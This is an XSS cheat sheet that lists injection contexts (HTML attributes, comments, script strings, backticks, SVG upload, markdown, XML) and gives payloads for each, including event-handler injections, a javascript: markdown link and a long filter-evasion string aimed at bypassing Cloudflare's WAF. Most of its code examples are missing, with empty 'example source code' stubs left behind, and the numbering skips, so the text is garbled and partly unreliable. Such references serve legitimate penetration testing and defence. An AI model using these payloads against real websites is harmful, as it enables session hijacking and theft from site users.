# XSS Cheat Sheet (Basic)
## Introduction
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into websites. There is 3 types of XSS Attack:
- Reflected XSS
Attack where the malicious script runs from another website through the web browser
- Stored XSS
Stored attacks are those where the injected script is permanently stored on the target servers
- DOM-Based XSS
A type of XSS that has payloads found in the DOM rather than within the HTML code.
## Where to find
This vulnerability can appear in all features of the application. If you want to find Dom-based XSS, you can find it by reading the javascript source code.
## How to exploit
1. Basic payload
2. Add ' or " to escape the payload from value of an HTML tag
* Example source code
* After input the payload
3. Add --> to escape the payload if input lands in HTML comments.
* Example source code
* After input the payload
4. Add when the input inside or between opening/closing tags, tag can be ```,,
* Example source code
* After input the payload
5. Use when input inside an attribute’s value of an HTML tag but > is filtered
" onmouseover=alert(1)
" autofocus onfocus=alert(1)
* Example source code
* After input the payload
6. Use when input inside ```
* Example source code
* After input the payload
## **XSS Cheat Sheet (Advanced)**
7. Use when input lands in a script block, inside a string delimited value.
* Example source code
* After input the payload
8. Same like Number 7. But inside a string delimited value but quotes are escaped by a backslash.
* Example source code
* If we input payload '-alert(1)-' it will be like this
The quotes are escaped by a backslash so we need to bypass them
* After input the payload
9. Use when there’s multi reflection in the same line of JS code
* Example source code
* After input the payload
10. Use when input inside a string delimited value and inside a single logical block like function or conditional (if, else, etc).
* Example source code
* After input the payload
> Payload number 2 uses when quote escaped by backslash
11. Use when input lands inside backticks delimited strings
* Example source code
* After input the payload
12. Uses when there is multiple reflections on same page. (Double Reflection)
'onload=alert(1)>alert(1)'>alert(1)/*' dapos.jpeg
16. XSS with SVG file (File Upload)
17. XSS via markdown
[Click Me](javascript:alert('1'))
18. XSS in XML page
> Add a "-->" to payload if input lands in a comment section
> Add a "]]>" if input lands in a CDATA section
## **XSS Cheat Sheet (Bypass)**
19. Mixed Case
20. Unclosed Tags
22. Encoded XSS
(Double Encoded)
(Triple Encoded)
23. JS Lowercased Input
24. PHP Email Validation Bypass
25. PHP URL Validation Bypass
26. Inside Comments Bypass
## Bypass WAF
1. Cloudflare
%2sscript%2ualert()%2s/script%2u -xss popup
"Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"/*/Onx=""//onfocus=prompt(1)>"//Onx=""/*/%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1`)"Onclick="([1].map(confirm))
[1].map(confirm)'ale'+'rt'()a	l	e	r	t(1)prompt(1)prompt(1)prompt%26%2300000000000000000040;1%26%2300000000000000000041;(prompt())(prompt``)
## References
- [Brute Logic](https://brutelogic.com.br/)
- Some random twitter posts